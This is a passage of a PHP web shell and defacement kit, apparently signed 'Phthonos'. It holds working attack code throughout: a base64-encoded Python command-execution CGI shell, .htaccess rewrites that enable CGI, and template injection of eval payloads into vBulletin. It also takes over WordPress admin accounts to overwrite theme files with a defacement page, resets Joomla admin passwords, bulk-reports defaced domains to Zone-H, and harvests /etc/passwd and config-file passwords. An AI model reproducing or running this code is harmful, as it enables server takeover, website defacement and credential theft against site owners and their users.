sICVZJykrJy48L0NFTlRFUj48QlI+Jw0KDQp0aGVmb3JtID0gIiIiPEgyPkVudGVyIENvbW1hbmQ8L0gyPg0KPEZPUk0gTUVUSE9EPVwiIiIiICsgTUVUSE9EICsgJyIgYWN0aW9uPSInICsgc2NyaXB0bmFtZSArICIiIlwiPg0KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+DQo8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9IlN1Ym1pdCI+PEJSPg0KPC9GT1JNPjxCUj48QlI+IiIiDQpib2R5ZW5kID0gJzwvQk9EWT48L0hUTUw+Jw0KZXJyb3JtZXNzID0gJzxDRU5URVI+PEgyPlNvbWV0aGluZyBXZW50IFdyb25nPC9IMj48QlI+PFBSRT4nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiMgbWFpbiBib2R5IG9mIHRoZSBzY3JpcHQNCg0KaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoNCiAgICBwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWwiICAgICAgICAgIyB0aGlzIGlzIHRoZSBoZWFkZXIgdG8gdGhlIHNlcnZlcg0KICAgIHByaW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjIHNvIGlzIHRoaXMgYmxhbmsgbGluZQ0KICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkNCiAgICBkYXRhID0gZ2V0Zm9ybShbJ2NtZCddLGZvcm0pDQogICAgdGhlY21kID0gZGF0YVsnY21kJ10NCiAgICBwcmludCB0aGVmb3JtaGVhZA0KICAgIHByaW50IHRoZWZvcm0NCiAgICBpZiB0aGVjbWQ6DQogICAgICAgIHByaW50ICc8SFI+PEJSPjxCUj4nDQogICAgICAgIHByaW50ICc8Qj5Db21tYW5kIDogJywgdGhlY21kLCAnPEJSPjxCUj4nDQogICAgICAgIHByaW50ICdSZXN1bHQgOiA8QlI+PEJSPicNCiAgICAgICAgdHJ5Og0KICAgICAgICAgICAgY2hpbGRfc3RkaW4sIGNoaWxkX3N0ZG91dCA9IG9zLnBvcGVuMih0aGVjbWQpDQogICAgICAgICAgICBjaGlsZF9zdGRpbi5jbG9zZSgpDQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRvdXQucmVhZCgpDQogICAgICAgICAgICBjaGlsZF9zdGRvdXQuY2xvc2UoKQ0KICAgICAgICAgICAgcHJpbnQgcmVzdWx0LnJlcGxhY2UoJ1xuJywgJzxCUj4nKQ0KDQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb24sIGU6ICAgICAgICAgICAgICAgICAgICAgICMgYW4gZXJyb3IgaW4gZXhlY3V0aW5nIHRoZSBjb21tYW5kDQogICAgICAgICAgICBwcmludCBlcnJvcm1lc3MNCiAgICAgICAgICAgIGYgPSBTdHJpbmdJTygpDQogICAgICAgICAgICBwcmludF9leGMoZmlsZT1mKQ0KICAgICAgICAgICAgYSA9IGYuZ2V0dmFsdWUoKS5zcGxpdGxpbmVzKCkNCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6DQogICAgICAgICAgICAgICAgcHJpbnQgbGluZQ0KDQogICAgcHJpbnQgYm9keWVuZA0KDQoNCiIiIg0KVE9ETy9JU1NVRVMNCg0KDQoNCkNIQU5HRUxPRw0KDQowNy0wNy0wNCAgICAgICAgVmVyc2lvbiAxLjAuMA0KQSB2ZXJ5IGJhc2ljIHN5c3RlbSBmb3IgZXhlY3V0aW5nIHNoZWxsIGNvbW1hbmRzLg0KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBwcm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4NCiIiIg==';
  407.  
  408. $file = fopen("python.izo" ,"w+");
  409. $write = fwrite ($file ,base64_decode($pythonp));
  410. fclose($file);
  411.     chmod("python.izo",0755);
  412.    echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>
  413.  
  414.  </div>"; }
  415.  
  416.  elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi')) { echo "<center/><br/><b>
  417.  +--==[ CGI-Telnet Version 1.3 ]==--+
  418.  </b><br><br>";
  419.  
  420.  
  421.     mkdir('cgi2012', 0755);
  422.     chdir('cgi2012');
  423.         $kokdosya = ".htaccess";
  424.         $dosya_adi = "$kokdosya";
  425.         $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  426.         $metin = "AddHandler cgi-script .izo";    
  427.         fwrite ( $dosya , $metin ) ;
  428.         fclose ($dosya);
  429. $cgi2012 = '';
  430.  
  431. $file = fopen("cgi2012.izo" ,"w+");
  432. $write = fwrite ($file ,base64_decode($cgi2012));
  433. fclose($file);
  434.     chmod("cgi2012.izo",0755);
  435.    echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>
  436.  
  437.  </div>"; }
  438.  
  439.  
  440.  elseif(isset($_GET['x']) && ($_GET['x'] == 'vb'))
  441. {      
  442. ?>
  443. <form action="?y=<?php echo $pwd; ?>&amp;x=vb" method="post">
  444.  
  445. <br><div align="center">
  446.  
  447. <font color="#00FF00">&nbsp;vB Index Changer</font><font color="#FF0000">
  448.  
  449. <br></font></div><br>
  450.  
  451. <?
  452.  
  453. if(empty($_POST['index'])){
  454. echo "<center><FORM method=\"POST\">
  455. host : <INPUT class=\"inputz\" size=\"15\" value=\"localhost\" style='color:#FF0000;background-color:#000000' name=\"localhost\" type=\"text\">
  456. database : <INPUT class=\"inputz\" size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"database\" type=\"text\"><br>
  457. username : <INPUT class=\"inputz\" size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"username\" type=\"text\">
  458. password : <INPUT class=\"inputz\" size=\"15\" style='color:#FF0000;background-color:#000000' value=\"vb\" name=\"password\" type=\"text\"><br>
  459. <br>
  460. <textarea class=\"inputz\" name=\"index\" cols=\"70\" rows=\"20\">Set Your Index</textarea><br>
  461. <INPUT class=\"inputzbut\" value=\"Set\" style='color:#FF0000;background-color:#000000' name=\"send\" type=\"submit\">
  462. </FORM></center>";
  463. }else{
  464. $localhost = $_POST['localhost'];
  465. $database = $_POST['database'];
  466. $username = $_POST['username'];
  467. $password = $_POST['password'];
  468. $index = $_POST['index'];
  469. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  470. @mysql_select_db($database) or die(mysql_error());
  471.  
  472. $index=str_replace("\'","'",$index);
  473.  
  474. $set_index = "{\${eval(base64_decode(\'";
  475.  
  476. $set_index .= base64_encode("echo \"$index\";");
  477.  
  478.  
  479. $set_index .= "\'))}}{\${exit()}}</textarea>";
  480.  
  481. echo("UPDATE template SET template ='".$set_index."' ") ;
  482. $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
  483.  
  484. if($ok){
  485. echo "!! update finish !!<br><br>";
  486. }
  487.  
  488. }
  489. # Footer
  490.  echo "</div>"; }
  491.  
  492.   elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){        ?>
  493. <form action="?y=<?php echo $pwd; ?>&amp;x=zone-h" method="post">
  494. <br><br><? echo '
  495. <center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="Phthonos" /><br> <select class="inputz" name="hackmode">
  496. <option>------------------------------------SELECT-------------------------------------</option>
  497. <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
  498. <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
  499. <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
  500. <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
  501. <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
  502. <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
  503. <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
  504. <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
  505. <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
  506. <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
  507. <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
  508. <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
  509. <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
  510. <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
  511. <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
  512. <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
  513. <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
  514. <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
  515. <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
  516. <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
  517. <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
  518. <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
  519. <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
  520. <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
  521. <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
  522. <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
  523. <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
  524. <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
  525.  
  526. <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
  527. <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
  528. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  529. </select> <br>
  530.  
  531. <select class="inputz" name="reason">
  532. <option >------------------------------------SELECT-------------------------------------</option>
  533. <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
  534. <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
  535. <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
  536. <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
  537. <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
  538. <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
  539. <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
  540. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  541. </select> <br>
  542. <textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br><br>
  543. <input class="inputz" type="submit" value=" Go !! " name="SendNowToZoneH"/><br>
  544. </form>'; ?>
  545. <?
  546.     echo "</form></center>";?>
  547. <?
  548. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  549. {
  550.     $k = curl_init();
  551.     curl_setopt($k, CURLOPT_URL, $url);
  552.     curl_setopt($k,CURLOPT_POST,true);
  553.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  554.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  555.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  556.     $kubra = curl_exec($k);
  557.     curl_close($k);
  558.     return $kubra;
  559. }
  560. {
  561.                 ob_start();
  562.                 $sub = @get_loaded_extensions();
  563.                 if(!in_array("curl", $sub))
  564.                 {
  565.                     die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
  566.                 }
  567.              
  568.                 $hacker = $_POST['defacer'];
  569.                 $method = $_POST['hackmode'];
  570.                 $neden = $_POST['reason'];
  571.                 $site = $_POST['domain'];
  572.                  
  573.                 if (empty($hacker))
  574.                 {
  575.                     die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
  576.                 }
  577.                 elseif($method == "--------SELECT--------")  
  578.                 {
  579.                     die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
  580.                 }
  581.                 elseif($neden == "--------SELECT--------")  
  582.                 {
  583.                     die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
  584.                 }
  585.                 elseif(empty($site))  
  586.                 {
  587.                     die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
  588.                 }
  589.                 $i = 0;
  590.                 $sites = explode("\n", $site);
  591.                 while($i < count($sites))  
  592.                 {
  593.                     if(substr($sites[$i], 0, 4) != "http")  
  594.                     {
  595.                         $sites[$i] = "http://".$sites[$i];
  596.                     }
  597.                     ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
  598.                     echo "Domain : ".$sites[$i]." Defaced Last Years !";
  599.                     ++$i;
  600.                 }
  601.                 echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]";
  602.             }
  603.  
  604. echo "</div>"; }
  605.  
  606.  
  607. elseif(isset($_GET['x']) && ($_GET['x'] == 'config')) { echo "<center/><br/><b><font color=blue>+--==[ Config Shell Priv8 SCR ]==--+</font></b><br><br>";
  608.  
  609.   mkdir('config', 0755);
  610.     chdir('config');
  611.         $kokdosya = ".htaccess";
  612.         $dosya_adi = "$kokdosya";
  613.         $dosya = fopen ($dosya_adi , 'w') or die ("Error cuyy!");
  614.         $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  615.                
  616. AddType application/x-httpd-cgi .cpc
  617.  
  618. AddHandler cgi-script .izo
  619. AddHandler cgi-script .izo";    
  620.         fwrite ( $dosya , $metin ) ;
  621.         fclose ($dosya);
  622. $configshell = '';
  623.  
  624.  
  625.  
  626. $file = fopen("config.izo" ,"w+");
  627. $write = fwrite ($file ,base64_decode($configshell));
  628. fclose($file);
  629.     chmod("config.izo",0755);
  630.    echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>
  631.    </div>"; }
  632.    
  633.   elseif(isset($_GET['x']) && ($_GET['x'] == 'wp')) { echo "<center/><br/><b><font color=blue>+--==[  Change WP Index ]==--+</font></b><br>";
  634.  
  635.    
  636. if($_POST['form_action'] == 1 )
  637.  {
  638.  
  639. $text=file_get_contents($_POST['file']);
  640.  
  641.        
  642.         $username=entre2v2($text,"define('DB_USER', '","');");
  643. $password=entre2v2($text,"define('DB_PASSWORD', '","');");
  644. $dbname=entre2v2($text,"define('DB_NAME', '","');");
  645. $prefix=entre2v2($text,"$table_prefix  = '","'");
  646. }
  647.  
  648.  if($_POST['form_action'] == 2 )
  649.  {
  650.  $prefix=($_POST['db_prefix']);
  651.  $username=($_POST['db_username']);
  652.  $password=($_POST['db_password']);
  653.  $dbname=($_POST['db_name']);
  654.  
  655.  
  656.        
  657.  
  658. }
  659. /*
  660. echo($username);
  661. echo("<br>");
  662. echo($password);
  663. echo("<br>");
  664. echo($dbname);
  665. echo("<br>");
  666. echo($prefix);
  667. echo("<br>");
  668. */
  669.  
  670. if ($_POST['form_action'])
  671. {
  672. $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
  673.       $link=mysql_connect("localhost",$username,$password) ;
  674.           if ($link) {
  675.          mysql_select_db($dbname,$link) ;
  676.                  $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'asepx0x',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `wp_users`.`ID` =1 LIMIT 1 ;");
  677. echo("<br>[+] Changing asepx0x password to 123456789");
  678.         $req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
  679.          $data = mysql_fetch_array($req);
  680. $site_url=$data["option_value"];
  681.          
  682.                  echo("<br>");
  683.          echo($data["option_value"]);echo("/wp-login.php");
  684.          }
  685.       $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  686.  
  687.  
  688.  
  689.          $url2=$site_url."/wp-login.php";
  690.  
  691. $ch = curl_init();
  692. curl_setopt($ch, CURLOPT_URL, $url2);
  693. curl_setopt($ch, CURLOPT_POST, 1);
  694. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=asepx0x&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
  695.  
  696. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  697. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  698. curl_setopt($ch, CURLOPT_HEADER, 0);
  699. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  700.     curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  701.     curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  702.  
  703.  
  704. $buffer = curl_exec($ch);
  705.  
  706. $pos = strpos($buffer,"admin");
  707.  
  708. if($pos === false) {
  709. echo("<br>[-] Login Error");
  710. exit;
  711. }
  712. else {
  713. echo("<br>[+] Login Successful");
  714. }
  715.    
  716. echo("<br>[*] Theme editor ...");
  717.          $url2=$site_url."/wp-admin/theme-editor.php";
  718.  
  719. $ch = curl_init();
  720. curl_setopt($ch, CURLOPT_URL, $url2);
  721.  
  722.  
  723. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  724. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  725. curl_setopt($ch, CURLOPT_HEADER, 0);
  726. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  727.     curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  728.      curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  729.  
  730.  
  731. $buffer = curl_exec($ch);
  732.  
  733.  
  734. $ar=explode( '<li><a href="theme-editor.php?file=', $buffer);
  735.      for($vi=0;$vi < count($ar);$vi++)
  736.      {
  737.         if(substr_count($ar[$vi],"(404.php)") != 0){
  738. $theme=entre2v2($ar[$vi],'/themes','">');
  739.         //      echo(entre2v2($ar[$vi],'/themes','">'));
  740. }
  741. }
  742.  
  743. if($theme) {
  744. echo("<br>[+] 404.php file founded in Theme Editor");
  745.  
  746. }
  747. else {
  748. echo("<br>[-] 404.php Not found in Theme Editor");
  749. exit;
  750. }
  751. echo("<br>[*] Updating 404.php .....");
  752.    
  753. //-----------------------------------------------------\\
  754. $theme=str_replace("&amp;","&",$theme);
  755.  
  756.   $url2=trim($site_url."/wp-admin/theme-editor.php?file=/themes".$theme);
  757.  
  758.  
  759. $ch = curl_init();
  760. curl_setopt($ch, CURLOPT_URL, $url2);
  761.  
  762.  
  763. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  764. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  765. curl_setopt($ch, CURLOPT_HEADER, 0);
  766.  
  767. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  768.     curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  769.     curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  770.  
  771.  
  772. $buffer0 = curl_exec($ch);
  773. //echo($buffer0);
  774.  
  775. $_wpnonce=entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  776. $_file=entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  777.  
  778.  
  779.          $url2=$site_url."/wp-admin/theme-editor.php";
  780.  
  781. $ch = curl_init();
  782. curl_setopt($ch, CURLOPT_URL, $url2);
  783. curl_setopt($ch, CURLOPT_POST, 1);
  784. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$h."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  785.  
  786. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  787. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  788. curl_setopt($ch, CURLOPT_HEADER, 0);
  789. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  790.     curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  791.     curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  792.  
  793.  
  794. $buffer = curl_exec($ch);
  795.  
  796. //echo($buffer);
  797. $pos = strpos($buffer,'<div id="message" class="updated">');
  798.  
  799. if($pos === false) {
  800. echo("<br>[-] Updating 404.php Error");
  801. exit;
  802. }
  803. else {
  804. echo("<br>[+] 404.php Updated Successfuly");
  805. }
  806.  
  807.  
  808. //////////////////////////////
  809.  
  810. $ar=explode( '<li><a href="theme-editor.php?file=', $buffer);
  811.      for($vi=0;$vi < count($ar);$vi++)
  812.      {
  813.         if(substr_count($ar[$vi],"(home.php)") != 0){
  814. $theme=entre2v2($ar[$vi],'/themes','">');
  815.         //      echo(entre2v2($ar[$vi],'/themes','">'));
  816. }
  817. }
  818.  
  819. if($theme) {
  820. echo("<br>[+] home.php file founded in Theme Editor");
  821.  
  822. }
  823. else {
  824. echo("<br>[-] home.php Not found in Theme Editor");
  825. exit;
  826. }
  827. echo("<br>[*] Updating home.php .....");
  828.    
  829. //-----------------------------------------------------\\
  830. $theme=str_replace("&amp;","&",$theme);
  831.  
  832.   $url2=trim($site_url."/wp-admin/theme-editor.php?file=/themes".$theme);
  833.  
  834.  
  835. $ch = curl_init();
  836. curl_setopt($ch, CURLOPT_URL, $url2);
  837.  
  838.  
  839. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  840. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  841. curl_setopt($ch, CURLOPT_HEADER, 0);
  842.  
  843. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  844.     curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  845.     curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  846.  
  847.  
  848. $buffer0 = curl_exec($ch);
  849. //echo($buffer0);
  850.  
  851. $_wpnonce=entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  852. $_file=entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  853.  
  854.  
  855.          $url2=$site_url."/wp-admin/theme-editor.php";
  856.  
  857. $ch = curl_init();
  858. curl_setopt($ch, CURLOPT_URL, $url2);
  859. curl_setopt($ch, CURLOPT_POST, 1);
  860. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$h."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  861.  
  862. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  863. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  864. curl_setopt($ch, CURLOPT_HEADER, 0);
  865. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  866.     curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  867.     curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  868.  
  869.  
  870. $buffer = curl_exec($ch);
  871.  
  872. //echo($buffer);
  873. $pos = strpos($buffer,'<div id="message" class="updated">');
  874.  
  875. if($pos === false) {
  876. echo("<br>[-] Updating home.php Error");
  877. exit;
  878. }
  879. else {
  880. echo("<br>[+] home.php Updated Successfuly");
  881. }
  882.  
  883. }
  884.  
  885.  
  886. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  887.  
  888. {
  889.  
  890. $ar0=explode($marqueurDebutLien, $text);
  891. $ar1=explode($marqueurFinLien, $ar0[1]);
  892. $ar=trim($ar1[0]);
  893. return $ar;
  894. }
  895.  
  896. ?>
  897.  
  898.  
  899. <br>
  900.  
  901. <FORM action=""  method="post">
  902. <input type="hidden" name="form_action" value="2">
  903. <br>
  904. <table align="center">
  905.  
  906. <tr><td>db_prefix </td><td><input type="text"  class='inputz' size="30" name="db_prefix" value="wp_"></td></tr>
  907. <tr><td>db_username </td><td><input type="text"  class='inputz' size="30" name="db_username" value=""></td></tr>
  908. <tr><td>db_password</td><td><input type="text"  class='inputz' size="30" name="db_password" value=""></td></tr>
  909. <tr><td>db_name</td><td><input type="text"  class='inputz' size="30" name="db_name" value=""></td></tr>
  910.  
  911.  
  912. </table>
  913. <br>
  914. <br>
  915. <TEXTAREA class='inputz' rows="18"  cols="50" name="code"><html><head></head><body><font color="#000000" face="Copperplate Gothic Light" size="5"><b>HaCkeD bY Phthonos<b></font><br>
  916.  
  917. <FONT face="Agency Fb" size="4" color="#ff0000"><b>: Phantom Hackers.PH | PHTHONOS <b></font><br>
  918.  
  919. <font face="Agency Fb" size="3" color="#000000"><b>-= &copy;  2013 by : Phthonos =-<b></font><br>
  920. <font face="Agency Fb" size="3" color="#ffffff"><b>-= by : Phthonos =-<b></font><br>
  921.         </TEXTAREA>
  922.         <br>
  923. <INPUT class='inputzbut' type="submit" value="Submit" name="Submit">
  924. </FORM></center><?php
  925.  
  926.   echo "
  927.    </div>"; }
  928.    
  929.     elseif(isset($_GET['x']) && ($_GET['x'] == 'joomla')) { echo "<center/><br/><b><font color=blue>+--==[  Joomla Mysql Admin Shell ]==--+</font></b><br><br>";
  930.         if(empty($_POST['pwd'])){
  931. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  932. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  933. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  934. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  935. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
  936. <tr><td>&nbsp;&nbsp;User baru</td><td>
  937. <input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
  938.  <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 =
  939. <input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;
  940.  
  941. <input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
  942. </td></tr> </table><br><br><br><br>
  943. ";
  944. }else{
  945. $localhost = $_POST['localhost'];
  946. $database  = $_POST['database'];
  947. $username  = $_POST['username'];
  948. $password  = $_POST['password'];
  949. $pwd   = $_POST['pwd'];
  950. $admin = $_POST['admin'];
  951. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  952. @mysql_select_db($database) or die(mysql_error());
  953. $hash = crypt($pwd);
  954. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  955. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  956. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  957. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  958. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  959. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  960. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  961. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  962. if($SQL){
  963. echo "<b>Success : skarang password barunya >>> - (123456)";
  964. }
  965. }
  966.        
  967.   echo "
  968.    </div>"; }
  969.  
  970.  elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping'))
  971.  
  972.         {      
  973.         ?>
  974.         <form action="?y=<?php echo $pwd; ?>&amp;x=jumping" method="post">
  975.         <?php
  976.  
  977.         //radable public_html
  978.         echo '<html><head><title>Jumping Finder</title></head><body>';
  979.         ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  980.         set_time_limit(0);
  981.         ###################
  982.         @$passwd = fopen('/etc/passwd','r');
  983.         if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  984.         $pub = array();
  985.         $users = array();
  986.         $conf = array();
  987.         $i = 0;
  988.         while(!feof($passwd))
  989.         {
  990.                 $str = fgets($passwd);
  991.                 if ($i > 35)
  992.                         {
  993.                         $pos = strpos($str,':');
  994.                         $username = substr($str,0,$pos);
  995.                         $dirz = '/home/'.$username.'/public_html/';
  996.                         if (($username != ''))
  997.                                 {
  998.                                 if (is_readable($dirz))
  999.                                         {
  1000.                                         array_push($users,$username);
  1001.                                         array_push($pub,$dirz);
  1002.                                         }
  1003.                                 }
  1004.                         }
  1005.                 $i++;
  1006.         }
  1007.        
  1008.         ###################
  1009.         echo '<br><br>';
  1010.         echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  1011.         echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br />";
  1012.         echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
  1013.         foreach ($users as $user)
  1014.                 {
